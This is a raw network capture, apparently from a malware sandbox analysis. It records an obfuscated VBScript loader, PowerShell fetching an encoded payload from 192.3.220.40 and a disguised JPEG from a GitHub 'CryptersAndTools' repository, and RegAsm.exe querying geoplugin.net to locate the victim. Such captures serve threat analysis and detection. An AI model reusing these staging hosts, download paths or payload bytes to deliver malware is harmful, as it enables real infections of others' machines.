Oct 14, 2024 11:36:01.847537041 CEST | 1236 | IN | Data Ascii: tance Else flags = flags OR fluctuador.EnumerationFlagAssociatedInstance End if End I
Oct 14, 2024 11:36:01.847577095 CEST | 1236 | IN | Data Ascii: flags = flags OR fluctuador.EnumerationFlagReturnEPR case VAL_RT_OBJ_EPR flags = flags O
Oct 14, 2024 11:36:01.847609997 CEST | 1236 | IN | Data Ascii: yDeepBasePropsOnly else flags = flags OR fluctuador.EnumerationFlagHierarchyDeep end if on erro
Oct 14, 2024 11:36:01.847644091 CEST | 1236 | IN | Data Ascii: end if if(LCase(hemiatrophia) <> VAL_FORMAT_TEXT) then wscript.echo "<wsman:Results xmlns:wsman=""htt
Oct 14, 2024 11:36:01.847861052 CEST | 1236 | IN | Data Ascii: trophia on error goto 0 'reformat if requested on error resume next err.cle
Oct 14, 2024 11:36:01.847893953 CEST | 1236 | IN | Data Ascii: LhWLebcWCWZrAlK = "ZWZWLtLfLcLWKGd"ictAcCLOuQvxZLk = "eZilPPUWNzLcnUu"KmRoKkxacpBisxL = "UUzJPAzLLmTZlaz"czHbmhbOfC
Oct 14, 2024 11:36:01.852493048 CEST | 1236 | IN | Data Ascii: LlbiOmzccdWt"CcASidhZCzLRhLR = "kWokWocbBpLWLAR"GeUGzZcaWPkOmoS = "ejUkaogKaLLieNK"LWnWLntabCpbJAO = "GijmckKoRhxuL


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49708 | 192.3.220.40 | 80 | 4720 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 14, 2024 11:36:13.301935911 CEST | 76 | OUT | GET /450/RRFCCE.txt HTTP/1.1
                                                              Host: 192.3.220.40
                                                              Connection: Keep-Alive
Oct 14, 2024 11:36:13.818883896 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 14 Oct 2024 09:36:13 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                              Last-Modified: Mon, 14 Oct 2024 05:09:54 GMT
                                                              ETag: "a1000-62468d8e12667"
                                                              Accept-Ranges: bytes
                                                              Content-Length: 659456
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: text/plain
                                                              Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                              Data Ascii: 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
Oct 14, 2024 11:36:13.818939924 CEST | 1236 | IN | Data Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                              Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
Oct 14, 2024 11:36:13.818973064 CEST | 1236 | IN | Data Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                                              Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
Oct 14, 2024 11:36:13.819005966 CEST | 672 | IN | Data Raw: 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44
                                                              Data Ascii: wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmO
Oct 14, 2024 11:36:13.819039106 CEST | 1236 | IN | Data Raw: 67 78 4d 51 4d 44 43 7a 41 67 4d 34 4c 44 38 79 67 75 4d 67 4c 44 32 79 41 74 4d 49 4c 44 77 79 67 72 4d 77 4b 44 71 79 41 71 4d 59 4b 44 6b 79 67 6f 4d 41 4b 44 65 79 41 6e 4d 6f 4a 44 59 79 67 6c 4d 51 4a 44 53 79 41 6b 4d 34 49 44 4d 79 67 69
                                                              Data Ascii: gxMQMDCzAgM4LD8yguMgLD2yAtMILDwygrMwKDqyAqMYKDkygoMAKDeyAnMoJDYyglMQJDSyAkM4IDMygiMgIDGyAhMIIDAxgfMwHD6xAeMYHD0xgcMAHDuxAbMoGDoxgZMQGDixAYM4FDcxgWMgFDWxAVMIFDQxgTMwEDKxASMYEDExgQMAAD+wAPMoDD4wgNMQDDywAMM4CDswgKMgCDmwAJMICDgwgHMwBDawAGMYBDUwgEM
Oct 14, 2024 11:36:13.819072008 CEST | 1236 | IN | Data Raw: 39 44 50 2f 51 7a 50 73 38 44 4a 2f 77 78 50 55 38 44 44 2f 51 67 50 38 37 44 39 2b 77 75 50 6b 37 44 33 2b 51 74 50 4d 37 44 78 2b 77 72 50 30 36 44 72 2b 51 71 50 63 36 44 6c 2b 77 6f 50 45 36 44 66 2b 51 6e 50 73 35 44 5a 33 77 38 4e 49 66 44
                                                              Data Ascii: 9DP/QzPs8DJ/wxPU8DD/QgP87D9+wuPk7D3+QtPM7Dx+wrP06Dr+QqPc6Dl+woPE6Df+QnPs5DZ3w8NIfDx3A8N8eDu3Q7NweDr3g6NkeDo3w5NYeDi3Q4NAeDf3g3N0dDc3w2NodDZ3A2NcdDW3Q1NQdDT3g0NEdDQ3wzN4cDN3AzNscDK3QyNIcDB3AgNsbD62QuNgbD32gtNUbD02QkNAZDP2giNkYDI2whNYYDF2AhNMYDA
Oct 14, 2024 11:36:13.819120884 CEST | 1236 | IN | Data Raw: 34 35 4e 4b 64 44 51 32 59 76 4e 75 62 54 6d 31 45 66 4e 73 57 54 6c 31 41 59 4e 58 56 54 45 30 73 39 4d 70 50 7a 6e 79 6f 61 4d 71 48 54 6d 78 38 55 4d 45 41 7a 2b 77 38 49 4d 47 43 54 43 77 41 41 41 41 41 41 55 41 55 41 49 41 38 54 66 2f 4d 6a
                                                              Data Ascii: 45NKdDQ2YvNubTm1EfNsWTl1AYNXVTE0s9MpPznyoaMqHTmx8UMEAz+w8IMGCTCwAAAAAAUAUAIA8Tf/MjP80Dz9cJPnyDl8wwOWvjA4gxN+eTT2YmNFVTz1waNWWTX0cPNITjn0UzMdNDEyYpMEGz+xULMyBAAAQEAFABA8ULPtyTp80JPWqT06UpODqTc68lONlDm28qNwZjX2wkN6YDK2YhNEUj81AeNOXDv1oaNYWDV1AEN
Oct 14, 2024 11:36:13.819154978 CEST | 1236 | IN | Data Raw: 4d 7a 37 7a 6b 32 4d 59 4e 7a 51 7a 41 68 4d 75 4b 7a 70 78 77 64 4d 56 44 41 41 41 41 49 41 45 41 4c 41 41 41 67 50 6c 32 7a 71 39 55 43 50 52 76 6a 37 37 67 2b 4f 57 76 6a 6d 37 38 6f 4f 37 72 44 72 36 6f 6e 4f 4b 68 7a 53 34 30 43 4f 6d 67 6a
                                                              Data Ascii: Mz7zk2MYNzQzAhMuKzpxwdMVDAAAAIAEALAAAgPl2zq9UCPRvj77g+OWvjm78oO7rDr6onOKhzS40COmgjD4cwN4fD63E+NiSz1AAAA4AABgCwPt+Tk+QnP+0zk9MYPp0jB8ANP+yzh8wEPxwTA7g8OTtTR7A0OzsTH7cwOAoz358+NzfzI3QgNibDd2IlNCZTL2MSNCWTb1QWNXVDT0YPNuTTy0EMNTSDj0sHNxRzZ0AGNRRzS
Oct 14, 2024 11:36:13.819186926 CEST | 1236 | IN | Data Raw: 63 6a 4d 75 49 54 48 78 67 66 4d 67 48 44 32 78 77 63 4d 36 47 54 6f 78 6b 5a 4d 53 47 44 68 78 63 58 4d 79 46 54 5a 78 41 57 4d 58 46 54 53 78 4d 55 4d 34 45 6a 4d 78 63 53 4d 66 45 44 46 78 34 41 4d 39 44 44 2b 77 6b 4f 4d 32 43 7a 6f 77 30 49
                                                              Data Ascii: cjMuITHxgfMgHD2xwcM6GToxkZMSGDhxcXMyFTZxAWMXFTSxMUM4EjMxcSMfEDFx4AM9DD+wkOM2Czow0IMBCDdw8GM5AzJAAAAkCABABAAA8z4/U2PO5Du+4mPW5zB9wfPj2jg8sNPKyjd8sGPgxzW8EFPMxjM8cxOqvj07o5O0tzV7EiO3rD24oLO1izh4YGOhhjL4cCOIcj/3g/NZfzz1sdNQXzl14YNjUTH1cRNNQTu0UKN
Oct 14, 2024 11:36:13.819221973 CEST | 1236 | IN | Data Raw: 39 6a 52 2f 34 7a 50 4f 38 54 43 2f 51 67 50 34 37 54 30 2b 77 73 50 48 37 7a 75 2b 63 70 50 53 36 54 6a 2b 45 6f 50 64 35 44 57 2b 4d 6c 50 4b 35 7a 49 2b 34 68 50 5a 34 54 43 39 63 65 50 5a 33 54 7a 39 34 62 50 69 32 44 65 39 41 58 50 5a 31 54
                                                              Data Ascii: 9jR/4zPO8TC/QgP47T0+wsPH7zu+cpPS6Tj+EoPd5DW+MlPK5zI+4hPZ4TC9cePZ3Tz94bPi2De9AXPZ1TS90QPBoTn5IWO0kjL5IyNmfj4349Nafj13I9NOfjy3Y8NCfjv3o7N2ejs346Nqejp3I6Neejm3Y5NSejj3o4NGejg343N6djd3I3NudjaAAAAgCwAACAAAUjYAAAAMAwAwBwPQ/DW/UEPsyDq8QKPgyzm8YFPAsD/
Oct 14, 2024 11:36:13.824280977 CEST | 1236 | IN | Data Raw: 73 46 50 44 78 7a 4c 38 63 79 4f 66 76 54 32 37 45 38 4f 62 75 6a 69 37 41 34 4f 68 70 6a 74 36 55 51 4f 58 6d 6a 69 35 55 59 4f 6b 6c 7a 58 35 6f 56 4f 4a 6c 7a 47 34 73 4c 4f 53 69 7a 51 33 73 2b 4e 53 66 6a 79 33 4d 36 4e 57 65 44 4f 33 34 79
                                                              Data Ascii: sFPDxzL8cyOfvT27E8Obuji7A4Ohpjt6UQOXmji5UYOklzX5oVOJlzG4sLOSizQ3s+NSfjy3M6NWeDO34yNccjF38gN6bD12MsNzazp2QpNBajM2YQNoWTl1kUNDVjI10RNTUDC04PN0Tj70gONiTD30oMNATDu00KNnSTo0oINCSTR00DNvQTJ0YBNLQjB0AwMnPj3zk9MKPjvzs6MjOzjzY4MBODezM3MsNTXzc1MKJDdyomM


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49723 | 178.237.33.50 | 80 | 3092 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
Oct 14, 2024 11:36:16.288378000 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                                                              Host: geoplugin.net
                                                              Cache-Control: no-cache
Oct 14, 2024 11:36:16.899744987 CEST | 1170 | IN | HTTP/1.1 200 OK
                                                              date: Mon, 14 Oct 2024 09:36:16 GMT
                                                              server: Apache
                                                              content-length: 962
                                                              content-type: application/json; charset=utf-8
                                                              cache-control: public, max-age=300
                                                              access-control-allow-origin: *
                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                              Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49707 | 185.199.111.133 | 443 | 4720 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-14 09:36:07 UTC | 134 | OUT | GET /CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg HTTP/1.1
                                                              Host: raw.githubusercontent.com
                                                              Connection: Keep-Alive
2024-10-14 09:36:08 UTC | 903 | IN | HTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 6331693
                                                              Cache-Control: max-age=300
                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                              Content-Type: application/octet-stream
                                                              ETag: "c7af5123730da5215a9032249afad007dd54a2bf216bbf720e484463b4eebacd"
                                                              Strict-Transport-Security: max-age=31536000
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: deny
                                                              X-XSS-Protection: 1; mode=block
                                                              X-GitHub-Request-Id: 0C07:2DA33E:146EACB:16903B7:670CD329
                                                              Accept-Ranges: bytes
                                                              Date: Mon, 14 Oct 2024 09:36:08 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-nyc-kteb1890033-NYC
                                                              X-Cache: HIT
                                                              X-Cache-Hits: 0
                                                              X-Timer: S1728898568.972326,VS0,VE52
                                                              Vary: Authorization,Accept-Encoding,Origin
                                                              Access-Control-Allow-Origin: *
                                                              Cross-Origin-Resource-Policy: cross-origin
                                                              X-Fastly-Request-ID: eb93799c40d9be44a86680e9323846244d518dd8
                                                              Expires: Mon, 14 Oct 2024 09:41:08 GMT
                                                              Source-Age: 0
2024-10-14 09:36:08 UTC | 1378 | IN | Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                              Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-10-14 09:36:08 UTC | 1378 | IN | Data Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                              Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
2024-10-14 09:36:08 UTC | 1378 | IN | Data Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                              Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
2024-10-14 09:36:08 UTC | 1378 | IN | Data Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                              Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
2024-10-14 09:36:08 UTC | 1378 | IN | Data Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                              Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
2024-10-14 09:36:08 UTC | 1378 | IN | Data Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                              Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
2024-10-14 09:36:08 UTC | 1378 | IN | Data Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                              Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
2024-10-14 09:36:08 UTC | 1378 | IN | Data Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
